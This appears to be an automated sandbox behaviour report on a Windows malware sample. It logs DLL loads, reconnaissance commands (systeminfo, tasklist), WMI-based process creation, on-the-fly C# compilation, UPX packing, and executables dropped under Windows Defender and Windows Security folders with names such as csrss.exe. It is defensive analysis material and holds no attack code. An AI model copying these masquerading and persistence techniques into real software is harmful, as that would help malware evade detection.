Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ktmw32.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: dlnashext.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wpdshext.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\tree.com	Section loaded: ulib.dll
Source: C:\Windows\System32\tree.com	Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: version.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: dbghelp.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: winsta.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\tasklist.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Windows Defender\en-US\based.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Windows Defender\en-US\7c80744c9cd64c
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Directory created: C:\Program Files\Windows Security\BrowserCore\en-US\886983d96e3d3e

Source: 8Ck8T5qRcC.exe

Static file information: File size 17830453 > 1048576

Source: 8Ck8T5qRcC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 8Ck8T5qRcC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 8Ck8T5qRcC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 8Ck8T5qRcC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8Ck8T5qRcC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 8Ck8T5qRcC.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: 8Ck8T5qRcC.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source: 8Ck8T5qRcC.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 8Ck8T5qRcC.exe, 00000000.00000000.1653907239.0000000000DC6000.00000002.00000001.01000000.00000003.sdmp, 8Ck8T5qRcC.exe, 00000000.00000002.1684587313.0000000000DC6000.00000002.00000001.01000000.00000003.sdmp, s.exe, 00000007.00000000.1692832193.0000000000DB3000.00000002.00000001.01000000.00000011.sdmp, s.exe, 00000007.00000003.1702500179.0000000007643000.00000004.00000020.00020000.00000000.sdmp, s.exe, 00000007.00000002.1728643045.0000000000DB3000.00000002.00000001.01000000.00000011.sdmp, svchost.exe, 0000000E.00000002.1729961468.0000000000193000.00000002.00000001.01000000.0000001E.sdmp, svchost.exe, 0000000E.00000003.1722014407.0000000005600000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000000.1720220248.0000000000193000.00000002.00000001.01000000.0000001E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: hacn.exe, 00000001.00000003.1686348982.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdbMM source: based.exe, 00000004.00000002.2415416350.00007FFE126EB000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\select.pdb source: based.exe, 00000004.00000002.2418711029.00007FFE130C1000.00000040.00000001.01000000.00000017.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\sqlite3.pdb source: based.exe, based.exe, 00000004.00000002.2397463940.00007FFDFF191000.00000040.00000001.01000000.00000015.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_sqlite3.pdb source: based.exe, 00000004.00000002.2414595024.00007FFE11EB1000.00000040.00000001.01000000.00000014.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: based.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb source: based.exe, based.exe, 00000004.00000002.2391546789.00007FFDFAC15000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\python310.pdb source: based.exe, 00000004.00000002.2394342718.00007FFDFB31F000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_bz2.pdb source: based.exe, 00000004.00000002.2415059724.00007FFE11ED1000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: based.exe, 00000004.00000002.2392560474.00007FFDFAEAF000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_queue.pdb source: based.exe, 00000004.00000002.2418451662.00007FFE12E11000.00000040.00000001.01000000.0000001C.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_ssl.pdb source: based.exe, 00000004.00000002.2398061369.00007FFE10241000.00000040.00000001.01000000.00000018.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_hashlib.pdb source: based.exe, 00000004.00000002.2398598485.00007FFE10301000.00000040.00000001.01000000.0000001B.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_lzma.pdb source: based.exe, 00000004.00000002.2415416350.00007FFE126EB000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1n 15 Mar 2022built on: Tue Mar 15 18:32:50 2022 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: based.exe, 00000004.00000002.2392560474.00007FFDFAEAF000.00000040.00000001.01000000.00000019.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: hacn.exe, 00000001.00000003.1685995112.000002A0E4693000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: hacn.exe, 00000001.00000003.1666084515.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp, based.exe, 00000002.00000003.1667289838.000001F919A0F000.00000004.00000020.00020000.00000000.sdmp, hacn.exe, 00000003.00000002.1763556973.00007FFE13311000.00000002.00000001.01000000.0000000C.sdmp, based.exe, 00000004.00000002.2419769711.00007FFE13241000.00000002.00000001.01000000.0000000E.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: hacn.exe, 00000001.00000003.1669308184.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_ctypes.pdb source: based.exe, 00000004.00000002.2419464738.00007FFE13201000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\_w\1\b\libssl-1_1.pdb@@ source: based.exe, 00000004.00000002.2391546789.00007FFDFAC15000.00000040.00000001.01000000.0000001A.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: hacn.exe, 00000003.00000002.1735603222.00007FFDFB78F000.00000002.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\_socket.pdb source: based.exe, 00000004.00000002.2414008753.00007FFE11511000.00000040.00000001.01000000.00000016.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: hacn.exe, 00000001.00000003.1669683608.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: hacn.exe, 00000001.00000003.1666802748.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\bin\amd64\unicodedata.pdb source: based.exe, 00000004.00000002.2390904759.00007FFDFAB8C000.00000040.00000001.01000000.0000001D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: hacn.exe, 00000001.00000003.1669883979.000002A0E4692000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: based.exe, based.exe, 00000004.00000002.2392560474.00007FFDFAF31000.00000040.00000001.01000000.00000019.sdmp

Source: 8Ck8T5qRcC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8Ck8T5qRcC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8Ck8T5qRcC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8Ck8T5qRcC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8Ck8T5qRcC.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\zgtjfxku\zgtjfxku.cmdline"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eodmidm4\eodmidm4.cmdline"

Source: C:\ProgramData\Microsoft\based.exe

Code function: 4_2_00007FFDFAC50740 EntryPoint,LoadLibraryA,GetProcAddress,VirtualProtect,VirtualProtect,VirtualProtect,

4_2_00007FFDFAC50740

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe

File created: C:\ProgramData\Microsoft\__tmp_rar_sfx_access_check_6601125

Jump to behavior

Source: python310.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x170f8b
Source: select.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0x12cec
Source: wxyubnjmnlae.tmp.18.dr	Static PE information: real checksum: 0x0 should be: 0x316d6
Source: based.exe.0.dr	Static PE information: real checksum: 0x5d9a9a should be: 0x5e534c
Source: _bz2.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0x174bf
Source: libssl-1_1.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x3d34c
Source: libcrypto-1_1.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x110586
Source: setup.exe.7.dr	Static PE information: real checksum: 0x55ddc3 should be: 0x56311d
Source: _ssl.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0x1721f
Source: _queue.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0xbdb3
Source: _socket.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0xf3db
Source: _sqlite3.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0x1ae1a
Source: svchost.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x3e6084
Source: _hashlib.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0xc47c
Source: libffi-7.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x9bb1
Source: based.exe.30.dr	Static PE information: real checksum: 0x0 should be: 0x397a7b
Source: HpQPPZazcv.exe.30.dr	Static PE information: real checksum: 0x0 should be: 0x397a7b
Source: unicodedata.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0x5531f
Source: s.exe.1.dr	Static PE information: real checksum: 0x0 should be: 0x62099a
Source: _ctypes.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0xe78a
Source: ChainComServermonitor.exe.14.dr	Static PE information: real checksum: 0x0 should be: 0x397a7b
Source: updater.exe.18.dr	Static PE information: real checksum: 0x55ddc3 should be: 0x56311d
Source: sqlite3.dll.2.dr	Static PE information: real checksum: 0x0 should be: 0x9ae0f
Source: powershell.exe.30.dr	Static PE information: real checksum: 0x0 should be: 0x397a7b
Source: _decimal.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0x28949
Source: _lzma.pyd.2.dr	Static PE information: real checksum: 0x0 should be: 0x213c2

Source: 8Ck8T5qRcC.exe	Static PE information: section name: .didat
Source: hacn.exe.0.dr	Static PE information: section name: _RDATA
Source: libcrypto-1_1.dll.1.dr	Static PE information: section name: .00cfg
Source: VCRUNTIME140.dll.1.dr	Static PE information: section name: _RDATA
Source: python310.dll.1.dr	Static PE information: section name: PyRuntim
Source: s.exe.1.dr	Static PE information: section name: .didat
Source: VCRUNTIME140.dll.2.dr	Static PE information: section name: _RDATA
Source: libffi-7.dll.2.dr	Static PE information: section name: UPX2
Source: setup.exe.7.dr	Static PE information: section name: .xdata
Source: svchost.exe.7.dr	Static PE information: section name: .didat
Source: updater.exe.18.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_3_00A184D5 pushad ; retf	0_3_00A184DD
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_3_00A184D5 pushad ; retf	0_3_00A184DD
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_3_00A0F9AF push cs; retf	0_3_00A0F9B2
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_3_00A0F9AF push cs; retf	0_3_00A0F9B2
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_3_00A184D5 pushad ; retf	0_3_00A184DD
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_3_00A184D5 pushad ; retf	0_3_00A184DD
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_3_00A0F9AF push cs; retf	0_3_00A0F9B2
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_3_00A0F9AF push cs; retf	0_3_00A0F9B2
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DB125A push ecx; ret	0_2_00DB126D
Source: C:\Users\user\Desktop\8Ck8T5qRcC.exe	Code function: 0_2_00DB1DB0 push ecx; ret	0_2_00DB1DC3
Source: C:\ProgramData\Microsoft\hacn.exe	Code function: 1_2_00007FF67D04506C push rcx; iretd	1_2_00007FF67D04506D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B30ACDD push rcx; retf 003Fh	2_2_000001F91B30ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B33C6DD push rcx; retf 003Fh	2_2_000001F91B33C6DE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 2_2_000001F91B36ACDD push rcx; retf 003Fh	2_2_000001F91B36ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201CFD9ACDD push rcx; retf 003Fh	4_2_00000201CFD9ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A5C6DD push rcx; retf 003Fh	4_2_00000201D1A5C6DE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00000201D1A8ACDD push rcx; retf 003Fh	4_2_00000201D1A8ACDE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA88F0E push r12; ret	4_2_00007FFDFAA88F35
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA86D06 push r12; ret	4_2_00007FFDFAA86D08
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA8A2F5 push rsp; retf	4_2_00007FFDFAA8A2F6
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA86CFA push rdx; ret	4_2_00007FFDFAA86D01
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA892F4 push r10; retf	4_2_00007FFDFAA89360
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA86EE0 push r12; ret	4_2_00007FFDFAA86EFE
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA86F42 push r12; ret	4_2_00007FFDFAA86F5A
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA86E9C push rsp; iretd	4_2_00007FFDFAA86E9D
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA88E76 push rbp; iretq	4_2_00007FFDFAA88E77
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA86CDC push r8; ret	4_2_00007FFDFAA86CE9
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA86EC6 push r10; retf	4_2_00007FFDFAA86EC9
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA8A4B9 push rdx; ret	4_2_00007FFDFAA8A510
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA86EAB push rsi; ret	4_2_00007FFDFAA86EAC
Source: C:\ProgramData\Microsoft\based.exe	Code function: 4_2_00007FFDFAA89C12 push rsp; retf	4_2_00007FFDFAA89C13

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1
Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Creates processes via WMI

Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exe	WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
